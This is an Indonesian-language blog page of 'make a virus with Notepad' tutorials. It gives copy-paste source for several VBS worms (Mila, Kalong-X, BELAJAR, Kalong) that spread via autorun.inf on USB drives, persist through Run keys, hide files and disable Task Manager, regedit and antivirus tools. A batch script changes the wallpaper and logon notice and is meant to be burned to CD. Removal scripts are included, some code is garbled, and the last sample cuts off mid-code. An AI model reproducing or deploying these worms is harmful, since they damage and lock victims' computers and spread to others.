Ads Fundi

Membuat virus From Notepad

Cara Membuat Virus Sederhana from Notepad


Buka Notepad kamu, copy-paste script di bawah ini..


-----------------------------------------------------------------------------------------------


@echo offcopy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /ycopy image_name(terserah dari nama file gambar pembuat).bmp

%systemdrive%\WINDOWS\ /ycopy image_name(terserah dari nama file gambar pembuat).bmp
%systemdrive%\WINDOWS\system32\ /ycopy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\ /ycopy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\ /ycopy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /yreg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /freg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /freg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /freg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /freg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /freg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /freg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
-
lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)- buat Autorun.inf dengan script:
[autorun]open=nama_file.bat

-
lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY- copy file-file tsb ke CD- nikmati efeknya
-

----------------------------------------------------------------------------------------------------------------------

MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD



1. Buka Notepad2. Copy kan kode dibawah ini:

on error resume nextdim rekur,syspath,windowpath,desades,longka,mf,isi,tf,F0nAb0530,nt,check,sdisi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”set longka = createobject(”Scripting.FileSystemObject”)set mf = longka.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdoSet windowpath = longka.getspecialfolder(0)Set syspath = longka.getspecialfolder(1)set tf = longka.getfile(syspath & “\recycle.vbs”)tf.attributes = 32set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)tf.write rekurtf.closeset tf = longka.getfile(syspath & “\recycle.vbs”)tf.attributes = 39for each desades in longka.drivesIf (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” thenset tf=longka.getfile(desades.path &”\Mila.sys.vbs”)tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)tf.write rekurtf.closeset tf=longka.getfile(desades.path &”\Mila.sys.vbs”)tf.attributes = 39set tf =longka.getfile(desades.path &”\autorun.inf”)tf.attributes = 32set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = longka.getfile(desades.path &”\autorun.inf”)tf.attributes=39end ifnextset F0nAb0530 = createobject(”WScript.Shell”)F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD”F0nAb0530.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1?, “REG_DWORD”F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1?F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2?F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“if check 1 thenWscript.sleep 200000end ifloop while check 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname3. Simpan dengan nama Black.sys.vbs

------------------------------------------------------------------------------------------------

Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….

‘Kalong-X‘Varian dari Kalong.VBSon error resume next‘Dim kata-kata berikutdim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd’siapkan isi autorunisi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo‘buat file indukSet windowpath = fs.getspecialfolder(0)set tf = fs.getfile(windowpath & “k4l0n6-x.dll.vbs “)tf.attributes = 32set tf = fs.createtextfile(windowpath & “k4l0n6-x.dll.vbs”,2,true)tf.write rekurtf.closeset tf = fs.getfile(windowpath & “k4l0n6-x.dll.vbs”)tf.attributes = 39’sebar ke removable disc ditambahkan dengan Autorun.inffor each desades in fs.drivesIf (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” thenset tf=fs.getfile(desades.path &”k4l0n6ms32.dll.vbs”)tf.attributes =32set tf=fs.createtextfile(desades.path &”k4l0n6ms32.dll.vbs”,2,true)tf.write rekurtf.closeset tf=fs.getfile(desades.path &”k4l0n6ms32.dll.vbs”)tf.attributes = 39set tf =fs.getfile(desades.path &”autorun.inf”)tf.attributes = 32set tf=fs.createtextfile(desades.path &”autorun.inf”,2,true)tf.write isitf.close
set tf = fs.getfile(desades.path &”autorun.inf”)tf.attributes=39end ifnext‘Manipulasi Registryset kalong = createobject(”WScript.Shell”)‘Ubah IE Titlekalong.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,”:: ->KALONG-X<- ::”‘File Hidden tak terlihatkalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden”,2, “REG_DWORD”‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanankalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1?, “REG_DWORD”kalong.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1?, “REG_DWORD”‘Buat pesan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “THE KALONG-X”kalong.RegWrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText”,”No reason for Panic”‘Aktifkan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, windowpath & “batch- k4l0n6.dll.vbs” ‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepadkalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exeDebugger”,”notepad.exe”kalong.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exeDebugger”,”notepad.exe”‘Bonusif check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullnameSetelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa

Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :[Version]Signature=”$Chicago$”Provider=Fariskhi[DefaultInstall]AddReg=UnhookRegKeyDelReg=del[UnhookRegKey]HKCU,SoftwareMicrosoftInternet ExplorerMain, Window Title,0, “INTERNET EXPLORER”[del]HKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoFindHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoFolderOptionsHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoRunHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableRegistryToolsHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem, DisableTaskMgrHKCU, SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer, NoViewContextMenuHKLM, SoftwareMicrosoftWindowsCurrentVersionWinlogon, LegalNoticeCaptionHKLM, SoftwareMicrosoftWindowsCurrentVersionWinlogon, LegalNoticeTextHKLM, SoftwareMicrosoftWindowsCurrentVersionRun, SystemdirHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionscmd.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsinstall.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedit.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsregedt32.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsRegistryEditor.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssetup.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-CLN.exe, DebuggerHKLM, SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsPCMAV-RTP.exe, DebuggerSetelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.
------------------------------------------------------------------------------------------------------------------------

==========================================================
Belajar membuat virus VBS dengan Notepad
Iseng-iseng mencolok Flash Disc saudara gw tiba-tiba gw nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini gw beri nama ?°BELAJAR.VBS?±. Sekarang buka Notepad-nya. Copy kode berikut :‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–// on error resume next ‘//–Dim kata-kata berikut ini–// dim rekur,windowpath,flashdrive,fs,mf,isi,tf,lagibelajar,nt,check,sd ‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–// isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe belajar.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do ‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows) Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- belajar.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- belajar.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- belajar.dll.vbs “) tf.attributes = 39 ‘//–Buat Autorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–// ‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives ‘//–Cek Drive–// If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then ‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–// set tf=fs.getfile(flashdrive.path &”\belajar.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\belajar.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\belajar.dll.vbs “) tf.attributes = 39 ‘//–Buat Autorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–// set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next ‘//–Manipulasi Registry–// set lagibelajar = createobject(”WScript.Shell”) ‘//–Manip - Ubah Title Internet Explorer menjadi belajar Mania–// lagibelajar.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” belajar MANIA “ ‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–// lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0?, “REG_DWORD” ‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–// lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1?, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1?, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1?, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRe
gistryTools”, “1?, “REG_DWORD” lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1?, “REG_DWORD” ‘//–Manip – Disable klik kanan–// lagibelajar.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1?, “REG_DWORD” ‘//–Manip - Munculkan Pesan Setiap Windows Startup–// lagibelajar.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm belajar. Variant from Rangga-Zay, don’t panic all data are safe.” ‘//–Manip – Aktif setiap Windows Startup–// lagibelajar.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- belajar.dll.vbs “ ‘//–Manip – Ubah RegisteredOwner dan Organization–// lagibelajar.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “belajar” lagibelajar.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”belajarMania” ‘//–LOOPing–// if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/, ” & Wscript.ScriptFullname ‘Akhir dari Kode Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih ?°All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

------------------------------------------------------------------------------------------------------
Pernahkah anda merasa diri anda seperti anti virus??? yeah itulah yang pernah gw rasa’in knapa???bagaimana tidak, entah itu kawan rumah, kampuzzz bahkan kawan nongkrong pun kalo ada permasalahan dengan virus nanya_Nye ke Gw padahal dia tawu dengan pasti kalo OS Win*** gw ga’ pake AntiVirus, spontan gw jawab dengan nada bercanda “Emang_Nye Gw AntiVirus hehe”…Walaupun begitu gw cukup bangga ama diri gw sendiri hehehehe!!!!Yang paling parah_Nye lagi, ada yang nekat bawa laptop_Nye keTempat Gw, Sepertinye Dia Yakin kalo gw bisa ngebasmi tuh virus padahal belum tentu(Menyedihkan)…setelah gw terawang ternyata virus_Nye cuma virus kacangan, sehingga dengan bermodal notepad pun bisa dibersihin ampe tuntas Coz Virus_Nye kaga’ meng Handle CommandPrompt N Task Manager, but jika proses virus_Nye diMatiin lewat Task Manager ga’ bisa, karna ada dua proses yang running, kalo yang atu dimatiin maka yang atu lagi akan memanggil_Nye lagi….untuk itu gw memanfaatkan notepad N gw tulis.........
@echo offecho matiin proses virus_Nyetaskkill /F /IM namavirus1.exe /IM namavirus2.exeecho apus Semua virus_Nye berdasarkan ukuranfor /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”echo apus virus yang Nyamarecho untuk drive c N subfolder_Nyefor /R C:\ %%a in (*.doc.exe) do del “%%a”echo untuk drive d N subfolder_Nyefor /R D:\ %%a in (*.doc.exe) do del “%%a”echo Ngembaliin Document yang diHiddencd /d c:\echo untuk drive C N subfolder_Nyeattrib *.doc -H -S -A /Scd /d d:\echo untuk drive D N subfolder_Nye

attrib *.doc -H -S -A /Sexitgw simpen script tersebut dengan nama 4L13N.batSelesai dech tinggal normalin registry_Nye N terakhir gw cuma dapet ucapan thank’s


aku malah ada dapat cara bikin virus dari notepad nihIseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//on error resume next‘//–Dim kata-kata berikut ini–//dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”set fs = createobject(”Scripting.FileSystemObject”)set mf = fs.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)Set windowpath = fs.getspecialfolder(0)set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)tf.attributes = 32set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)tf.write rekursiftf.closeset tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)tf.attributes = 39‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disketfor each flashdrive in fs.drives‘//–Cek Drive–//If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)tf.attributes =32set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)tf.write rekursiftf.closeset tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)tf.attributes = 39‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//set tf 